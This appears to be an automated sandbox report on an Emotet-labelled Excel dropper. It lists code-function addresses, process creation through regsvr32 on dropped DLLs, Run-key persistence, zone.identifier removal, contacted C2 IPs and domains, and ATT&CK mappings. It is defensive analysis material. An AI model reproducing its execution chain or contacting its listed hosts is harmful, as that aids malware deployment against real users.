                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001DC00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C800
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001EC08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000F60C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B814
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180007418
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001E61C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000421C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180007620
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000BE20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180003824
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180023228
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180010628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001DE2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000E42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001CA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001DA34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180028C38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001EA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002803C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B23C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180011C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180023840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002A244
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027448
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180023E4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180001650
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001B058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002765C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000145C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000EE5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180013A60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027A68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180002A6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002AA74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180014274
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017E74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D87C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180002480
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000FE84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180020490
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029094
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800098AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800164B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800168B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180026AB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800184BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800190BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800056BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180009AC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B0C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001C6CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800072CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180026CD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180020ED4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000BCD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800116DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180006ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800114E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800166E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800154EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800040EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800012F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800288F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800036FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FD00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D704
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000FB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001E30C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180015714
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002A518
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180021918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180004918
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001531C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000A31C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180020D20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000E720
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000D52C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180024F30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180025938
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000F138
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000E93C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027344
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180001744
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001D150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180004B50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180010D54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180022158
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180015958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002B55C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029360
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180018764
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180028768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180017B68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001A170
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180003970
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180004D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180010F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180018F80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180024D84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002A784
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180016F84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002358C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180028F8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180021594
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180011194
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180029198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000A198
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018002539C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800033A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800247AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800233B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800243B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180027DB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800027B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180026FBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180006BBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001B5C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800031C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180012FC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FFD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018001FBD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800117E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000C1E0
                      Source: 4470_02112022.xlsMacro extractor: Sheet name: Sheet6
                      Source: 4470_02112022.xlsMacro extractor: Sheet name: Sheet6
                      Source: 4470_02112022.xlsReversingLabs: Detection: 80%
                      Source: 4470_02112022.xlsVirustotal: Detection: 67%
                      Source: 4470_02112022.xlsMetadefender: Detection: 31%
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll"
                      Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx
                      Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll"
                      Source: C:\Windows\System32\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\HC8X1KC5.txt
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR5927.tmp
                      Source: classification engine | Classification label: mal100.troj.expl.evad.winXLS@12/10@4/50
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
                      Source: 4470_02112022.xls | OLE indicator, Workbook stream: true
                      Source: 4470_02112022.xls.0.dr | OLE indicator, Workbook stream: true
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_0000000180009D2C CloseHandle,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_1001B1B0 FindResourceA,LoadResource,LockResource,FreeResource
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: 4470_02112022.xls | Initial sample: OLE indicators vbamacros = False
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180006870 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180009097 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_00000001800230F3 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180006957 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180006212 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180008A56 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180005A82 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180006415 push ebp; retf
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_00000001800224FA push ebp; ret
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180008D61 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_000000018000658C push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180008E30 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180006633 push ebp; retf
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180006738 push 45C7D274h; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_0000000180008F44 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_0000000180006212 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_0000000180006870 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_0000000180006738 push 45C7D274h; iretd
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10014064 GetModuleHandleA,LoadLibraryA,GetProcAddress
                      Source: oxnv4.ooccxx.0.dr | Static PE information: real checksum: 0xc56a8 should be: 0xc2343
                      Source: 40hd04O0[1].dll.0.dr | Static PE information: real checksum: 0xc56a8 should be: 0xc2343
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\oxnv4.ooccxx
                      Source: C:\Windows\System32\regsvr32.exe | File created: C:\Windows\System32\SnILCOTnpOOFucYhP\FatGkw.dll (copy)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll

                      Boot Survival

                      barindex
                      Source: C:\Windows\System32\regsvr32.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FatGkw.dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\oxnv4.ooccxx

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10020690 IsWindowVisible,IsIconic
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10010AE4 IsIconic,GetWindowPlacement,GetWindowRect
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exe TID: 2212 | Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 1648 | Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2956 | Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2548 | Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2548 | Thread sleep time: -60000s >= -30000s
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll
                      Source: C:\Windows\System32\regsvr32.exe | API coverage: 2.8 %
                      Source: C:\Windows\System32\regsvr32.exe | Process information queried: ProcessInformation
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 10_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose
                      Source: C:\Windows\System32\regsvr32.exe | API call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_100342D0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10014064 GetModuleHandleA,LoadLibraryA,GetProcAddress
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10031FC0 GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetCommandLineA,FlsSetValue,GetCurrentThreadId
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10034370 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10034490 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10040590 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10039C90 SetUnhandledExceptionFilter
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10039CC0 SetUnhandledExceptionFilter
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_1002FF40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exe | Network Connect: 218.38.121.17 443
                      Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\SnILCOTnpOOFucYhP\FatGkw.dll"
                      Source: C:\Windows\System32\regsvr32.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoA
                      Source: C:\Windows\System32\regsvr32.exe | Code function: GetModuleHandleA,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetVersion,RegOpenKeyExA,RegQueryValueExA,ConvertDefaultLocale,ConvertDefaultLocale,RegCloseKey,GetModuleHandleA,EnumResourceLanguagesA,ConvertDefaultLocale,ConvertDefaultLocale,GetModuleFileNameA,GetLocaleInfoA,LoadLibraryA
                      Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA
                      Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar
                      Source: C:\Windows\System32\regsvr32.exe | Code function: EnumSystemLocalesA
                      Source: C:\Windows\System32\regsvr32.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP
                      Source: C:\Windows\System32\regsvr32.exe | Code function: GetUserDefaultLCID,EnumSystemLocalesA,GetUserDefaultLCID,GetLocaleInfoA,GetLocaleInfoA,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA
                      Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte
                      Source: C:\Windows\System32\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_1003F040 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_10031FC0 GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetCommandLineA,FlsSetValue,GetCurrentThreadId

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara match | File source: 00000009.00000002.1210607529.000000000039A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.1210571701.00000000002BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 8.2.regsvr32.exe.2010000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.regsvr32.exe.2010000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000A.00000002.1211898571.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.1210482177.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1211244100.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.940135302.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.939239138.0000000002010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.1210480334.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Tactics and techniques from the ATT&CK matrix (numbers in parentheses are the per-technique counts shown in the matrix):

                      Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
                      Execution: Scripting (2), Native API (1), Exploitation for Client Execution (43), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter
                      Persistence: Registry Run Keys / Startup Folder (11), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
                      Privilege Escalation: Process Injection (111), Registry Run Keys / Startup Folder (11), Extra Window Memory Injection (1), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
                      Defense Evasion: Masquerading (141), Virtualization/Sandbox Evasion (1), Process Injection (111), Scripting (2), Hidden Files and Directories (1), Obfuscated Files or Information (2), Regsvr32 (1), Extra Window Memory Injection (1)
                      Credential Access: Input Capture (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
                      Discovery: System Time Discovery (1), Security Software Discovery (12), Virtualization/Sandbox Evasion (1), Process Discovery (2), Application Window Discovery (1), File and Directory Discovery (2), System Information Discovery (26), Network Service Scanning
                      Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot
                      Collection: Input Capture (1), Archive Collected Data (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
                      Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                      Command and Control: Encrypted Channel (21), Ingress Tool Transfer (14), Non-Application Layer Protocol (3), Application Layer Protocol (124), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
                      Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
                      Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
                      Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue
                      Behavior Graph ID: 746414 | Sample: 4470_02112022.xls | Startdate: 15/11/2022 | Architecture: WINDOWS | Score: 100
                      Network (sample level): 103.224.241.74 (WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India), 210.57.209.142 (UNAIR-AS-IDUniversitasAirlanggaID Indonesia), 43 other IPs or domains
                      Signatures (sample level): Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 12 other signatures
                      Processes started at the root: EXCEL.EXE; regsvr32.exe (System process connects to network (likely due to code injection or exploit))
                      EXCEL.EXE: contacts www.spinbalence.com (Outdated Microsoft Office dropper detected), sat7ate.com and 4 other IPs or domains; drops C:\Users\user\oxnv4.ooccxx (PE32+), C:\Users\user\AppData\...\40hd04O0[1].dll (PE32+) and C:\Users\user\Desktop\4470_02112022.xls (Composite); Document exploit detected (creates forbidden files); Document exploit detected (UrlDownloadToFile); starts four regsvr32.exe instances
                      regsvr32.exe (started by EXCEL.EXE): drops C:\Windows\System32\...\FatGkw.dll (copy) (PE32+); Hides that the sample has been downloaded from the Internet (zone.identifier); starts regsvr32.exe
                      regsvr32.exe (started by the previous regsvr32.exe): connects to 218.38.121.17, 443, 49178, 49179 (SKB-ASSKBroadbandCoLtdKR Korea Republic of); Creates an autostart registry key pointing to binary in C:\Windows

                      Source | Detection | Scanner | Label
                      4470_02112022.xls | 81% | ReversingLabs | Document-Office.Trojan.Emotet
                      4470_02112022.xls | 68% | Virustotal |
                      4470_02112022.xls | 32% | Metadefender |
                      4470_02112022.xls | 100% | Avira | XF/Agent.B2

                      Source | Detection | Scanner | Label
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll | 81% | ReversingLabs | Win64.Trojan.Emotet
